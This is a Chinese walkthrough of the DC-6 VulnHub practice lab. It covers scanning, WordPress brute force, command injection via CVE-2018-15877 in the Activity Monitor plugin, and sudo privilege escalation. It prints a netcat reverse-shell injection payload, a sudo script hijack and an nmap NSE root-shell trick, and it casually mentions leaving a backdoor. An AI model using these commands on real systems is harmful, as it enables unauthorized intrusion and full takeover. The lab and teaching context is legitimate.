DC-6靶机渗透
环境搭建
详情
名称 | DC- 6 |
---|---|
发布日期 | 2019年2月28日 |
作者 | DCAU |
系列 | DC |
网页 | https://www.vulnhub.com/entry/dc-6,315/ |
描述
DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
这不是一个过于困难的挑战,所以应该非常适合初学者。
此挑战的最终目标是获得 root 权限并读取唯一的标志。
必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。
对于初学者,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文以获得帮助,让你重新开始。
但请注意:我不会给你答案,而是给你一个关于如何前进的想法。
使用工具
靶机:DC-6 192.168.10.164
hacker:kali 192.168.10.153
一:信息收集
0x01查看存活主机
arp-scan -l
0x02查看主机开放的端口
masscan --rate=100000 --ports 0-65535 192.168.10.164
0x03查看端口开放的服务
nmap -sV -T4 -O -p 80,22 192.168.10.164
0x04查看主机指纹信息
whatweb http://192.168.10.164
0x05访问靶机HTTP服务
发现浏览器找不到此网站(dns无法解析此ip)
添加“192.168.10.164 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)
发现可以进行正常访问,此时发现有word press建站后台登录口
二:漏洞发现
0x01 用户名枚举
wpscan --url http://wordy/ -e u
0x02 暴力破解用户名口令
wpscan --url http://wordy/ -U username.txt -P /usr/share/wordlists/rockyou.txt
发现activity monitor插件
0x03 漏洞信息查询
尝试搜索此插件的漏洞信息
查找到一个漏洞,查看使用手册
01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默认后台
wp-login.php Activity Monitor >tools 用命令执行
04 漏洞序号
CVE-2018-15877
三:漏洞利用
0x01 命令执行漏洞
尝试拼接命令,ping 192.168.10.153|ls
发现可以执行,抓包进行命令执行
ping 192.168.10.153| nc -e /bin/bash 192.168.10.153 1234
在hacker上监听1234端口
0x02getshell成功
反弹shell成功
0x03开启终端
python -c ‘import pty;pty.spawn("/bin/bash")’ 开启一个python终端
四:提权
0x01查看用户信息
cd 到/home/mark目录下查看文件things-to-do 文档,查看
翻译一下。。。提示到有用户 graham的口令,尝试su graham切换用户
查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行
0x02转换身份
echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh 尝试以jens身份执行此文件,发现切换成功
0x03 找到提权点
sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本
echo ‘os.execute("/bin/bash")’ > get_root.nse
nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
nmap --script=/home/jens/get_root.nse 执行此脚本
提权成功
0x04flag获取
cd 到root下拿到flag文件,渗透结束(可以留后门——)
总结
这次渗透测试,考察了hacker对于暴力破解的理解掌握,对于命令执行攻击漏洞以及对于反弹shell的理解和对于提权方式的掌握。